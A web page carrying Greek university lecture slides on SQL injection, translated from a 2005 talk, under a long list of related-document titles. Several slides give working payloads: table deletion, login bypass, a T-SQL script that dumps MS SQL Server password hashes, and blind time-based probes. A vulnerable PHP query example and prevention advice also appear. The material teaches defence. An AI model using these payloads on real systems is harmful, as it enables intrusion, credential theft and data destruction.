Προγραμματισμός Διαδικτύου

Σχετικά έγγραφα
Προγραμματισμός Παγκόσμιου Ιστού

TEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)

9η Εργαστηριακή Άσκηση: Stored Procedures - Triggers. Αποθηκευμένες Διαδικασίες (Stored Procedures):

Τμήμα Πληροφορικής ΑΠΘ

Προγραμματισμός Διαδικτύου

Ασφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή

Τμήμα Πληροφορικής ΑΠΘ

PHP/MySQL και Project

Σχεδίαση Βάσεων Δεδομένων


Εργαστήριο Βάσεων Δεδομένων

Εργαστήριο Βάσεων Δεδομένων. Δικαιώματα Χρηστών Προβολές

Η SQL αποτελείται από δύο υποσύνολα, τη DDL και τη DML.

ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ. Πανεπιστήμιο Πειραιώς Τμήμα Ψηφιακών Συστημάτων Μανουσόπουλος Χρήστος

Θέματα Προγραμματισμού Διαδικτύου ~ MySQL & PHP ~

Προγραμματισμός Διαδικτύου Ασκήσεις Εργαστηρίου

TEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)

Διαχείριση Πολιτισμικών Δεδομένων

Τεχνολογία Πολιτισμικού Λογισμικού

Σχεδιασμός Βάσεων Δεδομένων

ΕΙΣΑΓΩΓΗ ΣΤΗΝ ΠΛΗΡΟΦΟΡΙΚΗ

Ιατρική Πληροφορική. Δρ. Π. ΑΣΒΕΣΤΑΣ ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΒΙΟΪΑΤΡΙΚΗΣ ΤΕΧΝΟΛΟΓΙΑΣ Τ.Ε.

Βάσεις Δεδομένων 2η εργαστηριακή άσκηση

Injection Attacks. Protocol Host FilePath. field1=valuex&field2=valuey. Query String. Web server HTTP GET.

ΦΡΟΝΤΙΣΤΗΡΙΟ ΣΤΗ ΓΛΩΣΣΑ SQL

ΦΡΟΝΤΙΣΤΗΡΙΟ ΣΤΗ ΓΛΩΣΣΑ SQL

Ιατρική Πληροφορική. Δρ. Π. ΑΣΒΕΣΤΑΣ ΤΜΗΜΑ ΜΗΧΑΝΙΚΩΝ ΒΙΟΪΑΤΡΙΚΗΣ ΤΕΧΝΟΛΟΓΙΑΣ Τ. Ε. Χρήσιμοι Σύνδεσμοι

ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Ι Ενότητα 3:

ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΙΓΑIΟΥ & ΑΕΙ ΠΕΙΡΑΙΑ Τ.Τ.

ΠΑΝΕΠΙΣΤΗΜΙΟ ΚΡΗΤΗΣ. 1 ο ΣΧΟΛΕΙΟ ΚΩΔΙΚΑ «Βασικά Θέματα Προγραμματισμού στην Ανάπτυξη Δυναμικών Διαδικτυακών Εφαρμογών» (Part 3) Ουρανία Σμυρνάκη

ΕΛΛΗΝΙΚΟ ΑΝΟΙΚΤΟ ΠΑΝΕΠΙΣΤΗΜΙΟ

Εφαρµογές διαδικτύου µε PHP

Βάσεις Δεδομένων 5η εργαστηριακή άσκηση

H SQL είναι η γλώσσα για όλα τα εμπορικά σχεσιακά συστήματα διαχείρισης βάσεων δεδομένων

Τμήμα Διοίκησης Επιχειρήσεων

10 η Διάλεξη Python Βάσεις δεδομένων στη python

Ορισμοί Σχεσιακού Μοντέλου και Τροποποιήσεις Σχέσεων σε SQL

databases linux - terminal (linux / windows terminal)

Συστήματα Διαχείρισης Βάσεων Δεδομένων

Εισαγωγή στην πληροφορική

Ορισμοί Σχεσιακού Μοντέλου και Τροποποιήσεις Σχέσεων σε SQL

SQL Τύποι Δεδομένων Δημιουργία Πίνακα Παράδειγμα.. Εργαστήριο Βάσεων Δεδομένων. Εισαγωγή στη MySQL (1)

ΤΜΗΜΑ ΔΙΟΙΚΗΣΗΣ ΕΠΙΧΕΙΡΗΣΕΩΝ (ΓΡΕΒΕΝΑ)

TEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)

Σχεδιασμός Πληροφοριακών Συστημάτων. Σημειώσεις

Αποθηκευμένες Διαδικασίες Stored Routines (Procedures & Functions)

ΣΧΕΔΙΑΣΜΟΣ ΒΑΣΕΩΝ ΔΕΔΟΜΕΝΩΝ ΕΡΓΑΣΤΗΡΙΟ 3

Βασικές Εντολές SQL. Θεωρία & Εντολές SQL. Γραμμή Εντολών MS-DOS (MySQL)

ΠΑΝΕΠΙΣΤΗΜΙΟ ΙΩΑΝΝΙΝΩΝ ΤΜΗΜΑ ΜΑΘΗΜΑΤΙΚΩΝ

Ορισμοί Σχεσιακού Μοντέλου και (απλές)τροποποιήσεις Σχέσεων στην SQL. Βάσεις Δεδομένων Ευαγγελία Πιτουρά 1

ΕΣΔ 232: ΟΡΓΑΝΩΣΗ ΔΕΔΟΜΕΝΩΝ ΣΤΗΝ ΚΟΙΝΩΝΙΑ ΤΗΣ ΠΛΗΡΟΦΟΡΙΑΣ. Ακαδημαϊκό Έτος , Εαρινό Εξάμηνο Διδάσκων Καθ.: Νίκος Τσαπατσούλης

PROJECT ΕΡΓΑΣΤΗΡΙΩΝ ΒΑΣΕΩΝ ΔΕΔΟΜΕΝΩΝ Ι. Τμήμα Μηχανικών Πληροφορικής Τ.Ε.

Εργαστήριο #10 (Ε10) 1

ΕΣΔ 232: ΟΡΓΑΝΩΣΗ ΔΕΔΟΜΕΝΩΝ ΣΤΗ ΚΟΙΝΩΝΙΑ ΤΗΣ ΠΛΗΡΟΦΟΡΙΑΣ. Ακαδημαϊκό Έτος , Εαρινό Εξάμηνο. Εργαστηριακή Άσκηση 4 7/02/2012

Βάσεις Δεδομένων ΗγλώσσαSQL (Structured Query Language)

ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Ι. Ενότητα 7α: SQL (NULL, Διαίρεση) Ευαγγελίδης Γεώργιος. Τμήμα Εφαρμοσμένης Πληροφορικής ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Ι

ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Ι. Ενότητα 9β: SQL (Διαχείριση εγγραφών, Όψεις, Περιορισμοί, Εναύσματα) Ευαγγελίδης Γεώργιος. Τμήμα Εφαρμοσμένης Πληροφορικής

Web exploitation: Ένα πραγματικό παράδειγμα

ΗΥ-360 Αρχεία και Βάσεις Δεδομένων Διδάσκων: Δ. Πλεξουσάκης. Φροντιστήριο SQL Examples Ξένου Ρουμπίνη

Τεχνολογία Πολιτισμικού Λογισμικού

TEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)

Ηλεκτρονικοί Υπολογιστές II

Θέματα Προγραμματισμού Η/Υ

Εργαστήριο Βάσεων Δεδομένων. Triggers

Πληροφορική ΙΙ Θεματική Ενότητα 6

Ορισµοί Σχεσιακού Μοντέλου και Τροποποιήσεις Σχέσεων σε SQL

SQL Data Manipulation Language

ΔΟΜΗ. Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Δ. Ζήνδρος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών

Προγραμματισμός και Συστήματα στον Παγκόσμιο Ιστό Ενότητα 3: Server Side Scripting II PHP & MySQL

Εργαστήριο βάσεων δεδομένων. MySQL Stored Procedures

Αλγοριθμική & Δομές Δεδομένων- Γλώσσα Προγραμματισμού Ι (PASCAL) (PASCAL ) Μεταβλητές- Τύποι- Τελεστές

ΛΥΚΕΙΟ ΣΟΛΕΑΣ Σχολική χρονιά

Hellenic European Law Concordance

Βάσεις Δεδομένων Η γλώσσα SQL (Structured Query Language) Εισαγωγή στην SQL (2) Ιστορικά Στοιχεία. SQL - Structured Query Language (1)

Εργαστήριο 9. Προγραμματιστικές Εφαρμογές στο Διαδίκτυο. Στόχος. Προετοιμασία περιβάλλοντος εργασίας

Φόρμες και Αγαπημένα. Έκδοση 5.2. Οδηγός διαχειριστή

MySQL + Γλώσσα Προγραμματισμού. Βάσεις Δεδομένων Ευαγγελία Πιτουρά 1

Ασφάλεια Πληροφοριακών Συστημάτων

Ανοικτά Ακαδημαϊκά Μαθήματα

PL/SQL. Κώστας Στεφανίδης

Βάσεις δεδομένων. (10 ο μάθημα) Ηρακλής Βαρλάμης

ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Ι. Ενότητα 9α: Περιορισμοί (Constraints) Εναύσματα (Triggers) Ευαγγελίδης Γεώργιος Τμήμα Εφαρμοσμένης Πληροφορικής

ΠΑΝΕΠΙΣΤΗΜΙΟ ΠΑΤΡΩΝ - ΤΜΗΥΠ ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ Ι

Πληροφορική 2. Βάσεις Δεδομένων (Databases)

Φόρμες και αγαπημένα. Έκδοση 5.1. Οδηγός διαχειριστή

. Εργαστήριο Βάσεων Δεδομένων. Triggers

Αρχιτεκτονική Συστημάτων Βάσεων Δεδομένων. Κατηγορίες χρηστών ΣΔΒΔ Αρχιτεκτονική ANSI/SPARC Γλώσσες ερωτημάτων Μοντέλα δεδομένων Λειτουργίες ΣΔΒΔ

ΓΡΑΠΤΕΣ ΠΡΟΑΓΩΓΙΚΕΣ ΕΞΕΤΑΣΕΙΣ ΜΑΪΟΥ-ΙΟΥΝΙΟΥ 2015

ΒΑΣΕΙΣ ΔΕΔΟΜΕΝΩΝ. Πανεπιστήμιο Πειραιώς Τμήμα Ψηφιακών Συστημάτων Μανουσόπουλος Χρήστος

Βάςεισ Δεδομζνων Ι. Ενότητα 7: Ειςαγωγή ςτην γλώςςα_sql. Δρ. Σςιμπίρθσ Αλκιβιάδθσ Σμιμα Μθχανικϊν Πλθροφορικισ ΣΕ

- Αναπαράσταση ακέραιας τιµής : - Εύρος ακεραίων : - Ακέραιοι τύποι: - Πράξεις µε ακεραίους (DIV - MOD)

Πληροφορική ΙΙ Θεματική Ενότητα 5

Προγραμματισμός Ηλεκτρονικών Υπολογιστών 1

Εισαγωγή στην Oracle Spatial 10g

Αρχεία και Βάσεις Δεδομένων

TEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)

Βάσεις Περιβαλλοντικών Δεδομένων

ΚΕΡΑΜΟΠΟΥΛΟΣ ΕΥΚΛΕΙΔΗΣ

ΘΕΜΑΤΑ. Ερώτηση 1 Κατά τη Φυσική Αποθήκευση (Physical storage) μιας ΒΔ αποθηκεύονται στον δίσκο τα:

TEC610 Δυναμικές Εφαρμογές Διαδικτύου (ΣΤ εξάμηνο)

Transcript:

Τμήμα Μηχανικών Πληροφορικής & Τηλεπικοινωνιών Προγραμματισμός Διαδικτύου Δρ. Μηνάς Δασυγένης mdasygenis@uowm.gr

Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για εκπαιδευτικό υλικό, όπως εικόνες, που υπόκειται σε άλλου τύπου άδειας χρήσης, η άδεια χρήσης αναφέρεται ρητώς. 2

SQL Injection Attacks Andrey Rakowitsch November 18 th 2005 3

Πρώτον: Τι είναι το SQL; Δομημένη γλώσσα ερωτήματος: διεπαφή σε συστήματα σχεσιακών βάσεων δεδομένων. Επιτρέπει την εισαγωγή, την ενημέρωση, τη διαγραφή και την ανάκτηση δεδομένων σε μια βάση δεδομένων. ANSI, πρότυπο ISO, χρησιμοποιείται εκτεταμένα σε εφαρμογές ιστού. Παράδειγμα: select ProductName from products where ProductID = 40; 4

Πώς χρησιμοποιείται κανονικά σε ιστότοπους; 1. Πάρτε την είσοδο χρήστη από μια φόρμα ιστού και να την μεταβιβάσετε σε ένα σενάριο πλευράς-διακομιστή μέσω HTTP μεθόδων όπως POST ή GET. 2. Διαδικασία αίτησης, ανοιχτή σύνδεση με τη βάση δεδομένων. 3. Ζητήστε βάση δεδομένων και ανακτήστε τα αποτελέσματα. 4. Αποστολή των επεξεργασμένων αποτελεσμάτων πίσω στο χρήστη. Web server Application server Database server 5

Παράδειγμα PHP $name = $HTTP_POST_VARS["name"]; $query = select * from restaurants where name =.$name. ; $result = mysql_query($query); 6

Τι είναι το SQL Injection; Η δυνατότητα εισαγωγής εντολών SQL στη μηχανή βάσης δεδομένων μέσω της υπάρχουσας εφαρμογής. Για παράδειγμα, εάν που εισάγει ο χρήστης είναι «23 ή 1 = 1» select ProductName from products where ProductID = 23 or 1 = 1 Όλα τα ονόματα προϊόντων θα επιστραφούν. Διαρροή δεδομένων. 7

Τι είναι το SQL Injection; Ελάττωμα στη διαδικτυακη εφαρμογή, όχι σε βάση δεδομένων ή web server. Ανεξάρτητα από το πόσο μπαλλωμένο είναι το σύστημά σας, ανεξάρτητα από το πόσα λιμάνια κλείνετε, ένας εισβολέας μπορεί να πάρει πλήρη ιδιοκτησία της βάσης δεδομένων σας. Το NMap ή το Nessus δεν θα σας βοηθήσουν ενάντια στον αυστηρό κώδικα. Στην ουσία, ο πελάτης παρέχει δεδομένα χωρίς επικύρωση. 8

Σύντομο Ιστορικό της Έγχυσης SQL Πρώτη αναφορά από κουτάβι τροπικών δασών στο Phrack 54, Δεκέμβριος 1998. Το Φεβρουάριο του 2000 το rfp δημοσιεύει: "Πώς χάκαρα το Packetstorm - Μια ματιά στο hacking wwwthreads μέσω SQL". Ιανουάριος 2002 Ο Chris Anley δημοσίευσε "Advanced SQL Injection σε εφαρμογές SQL Server". Πρώτο σε βάθος χαρτί. Στο Blackhat 2004, το 0x90.org κυκλοφορεί το SQeaL (προκάτοχος του Absinthe). 9

Τι μπορεί να κάνει η SQL Injection; Διαγραφή Select productinfo from table where productname = whatever ; DROP TABLE productinfo; -- Παράκαμψη ταυτότητας Select * from users where username= user and password= passwd ; select * from users where username= admin -- and password= whocares ; 10

Δεν είναι πάντα τόσο απλό Grabbing MS SQL Server Hashes: '; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16) set @var=':' select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null) begin while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=convert(int, SUBSTRING(@binvalue,@i,1)) select @firstint=floor(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 end select @var=@var+' '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null) end select @var as x into temp end end -- 11

Οι δυνατότητες είναι ατελείωτες Μερικά παραδείγματα: - Βίαιη επιβολή κωδικών πρόσβασης χρησιμοποιώντας επιθετικό διακομιστή για να κάνει την επεξεργασία. - Αλληλεπίδραση με το λειτουργικό σύστημα, ανάγνωση και εγγραφή αρχείων. - Συγκεντρώστε πληροφορίες IP μέσω αντίστροφης αναζήτησης. - Ξεκινήστε την υπηρεσία FTP στον επιτιθέμενο διακομιστή. - Ανάκτηση κωδικών πρόσβασης VNC από το μητρώο. - Μεταφόρτωση αρχείου. 12

Σφάλμα βασισμένο σε SQL Injection select * from table where id = convert(int,system_user) Έξοδος: [Microsoft] [ODBC SQL Server Driver] [SQLServer] Σφάλμα σύνταξης μετατροπής της τιμής nvarchar "sa" σε μία στήλη τύπου δεδομένων int. Το σφάλμα βασισμένο σε SQL Injection χρησιμοποιείται αποκλειστικά σε διακομιστές Microsoft SQL. 13

Blind SQL Injection Όταν δεν υπάρχει ρητή πληροφορία σφάλματος στον εισβολέα. Χρησιμοποιήστε λογικές τιμές (boolean) για να ρωτήσετε τη βάση δεδομένων με ναι ή όχι ερωτήσεις, στη συνέχεια ερμηνεύστε τα αποτελέσματα HTML για TRUE και FALSE υπογραφές. Πολύ πιο αργό: Στην χειρότερη περίπτωση, χρειάζονται 7 ναι ή όχι ερωτήσεις για να βρεθεί ο πρώτος χαρακτήρας ενός ονόματος χρήστη χρησιμοποιώντας δυαδική αναζήτηση. Αυτός είναι ο λόγος για τον οποίο υπάρχουν αυτοματοποιημένα εργαλεία. 14

Blind SQL Injection (Παράδειγμα) Βασικές περιπτώσεις eng.usf.edu/results.jsp?id=4 and 1 = 1 (always true) eng.usf.edu/results.jsp?id=4 and 1 = 0 (always false) Είναι ο 8ος χαρακτήρας του ονόματος χρήστη μεγαλύτερος από την τιμή ASCII 82; Εξάγει δεδομένα ενός χαρακτήρα κάθε φορά. 15

Πώς να αναγνωρίσετε τις υπογραφές T και F; Διάφορες λύσεις: - Αναζήτηση με λέξη κλειδί - MD5 Sum - Μηχανισμός διαφοράς κειμένου - HTML Parse Tree - Γραμμική αναπαράσταση των ποσών ASCII - Σύγκριση μπάντας αντοχής με αφαιρετικό φίλτρο - Προσαρμοστικό φίλτρο 16

Blind SQL Injection ΣΗΜΕΙΩΣΗ: Ακόμα και όταν οι λογικές (boolean) υπογραφές HTML δεν είναι διαθέσιμες, ένας εισβολέας μπορεί να χρησιμοποιήσει, αν δηλώσεις για να πάρει ένα ναι ή δεν απαντά. Παραδείγματα: '; if condition waitfor delay '0:0:5' '; union select if( condition, benchmark (100000, sha1('test')), 'false' ),1,1,1,1; 17

Πρόληψη Ελέγξτε και φιλτράρετε την είσοδο του χρήστη. - Όριο μήκους εισόδου (οι περισσότερες επιθέσεις εξαρτώνται από τις μεγάλες σειρές ερωτημάτων). - Οι διαφορετικοί τύποι εισροών έχουν μια συγκεκριμένη γλώσσα και σύνταξη που σχετίζονται με αυτά, π.χ. το όνομα, το ηλεκτρονικό ταχυδρομείο κ.λπ. - Μην επιτρέπετε, ύποπτα παραδείγματα λέξεων-κλειδιών (DROP, INSERT, SELECT, SHUTDOWN) ως όνομα. - Προσπαθήστε να δεσμεύσετε μεταβλητές σε συγκεκριμένους τύπους. 18

Πρόληψη Καλέστε αποθηκευμένες διαδικασίες, αντί της απευθείας αποστολής δηλώσεων SQL στη βάση δεδομένων. - Καλό για να δεσμεύσετε τις μεταβλητές. - Έχει κάποια σχετική επιβάρυνση - Πιο δύσκολο να κωδικοποιηθεί, όχι τόσο ευέλικτο. 19

Πρόληψη Αρχή του ελάχιστου προνομίου - Ένας χρήστης ή μια διαδικασία θα πρέπει να έχει το χαμηλότερο επίπεδο προνομίου που απαιτείται για να εκτελέσει την αποστολή του. - Εάν γνωρίζετε ότι ένας συγκεκριμένος χρήστης θα διαβάσει μόνο από τη βάση δεδομένων, μην του παραχωρήσετε δικαιώματα root. - Διαχωρίστε τους χρήστες. Ορίστε τους ρόλους. 20

Πρόληψη Ρύθμιση της αναφοράς σφαλμάτων - Μην εκθέτετε ποτέ στον χρήστη κανένα στοιχείο. Σύστημα ανίχνευσης εισβολών - Είναι δυνατή η λήψη υπογραφών επιθέσεων SQL Injection. (ειδικά blind) - Καταγράψτε τη συμπεριφορά "DoS like". "Προειδοποίηση: έχει εντοπιστεί παράνομη χρήση αυτής της εφαρμογής. Θα αναληφθούν νομικές ενέργειες.. - Τυχαία γενεά σπόρων για να χαλάσουν οι αληθείς (TRUE) και ψευδείς (FALSE) υπογραφές. 21

2025 © DocPlayer.gr Πολιτική Απορρήτου | Όροι Χρήσης | Σχόλια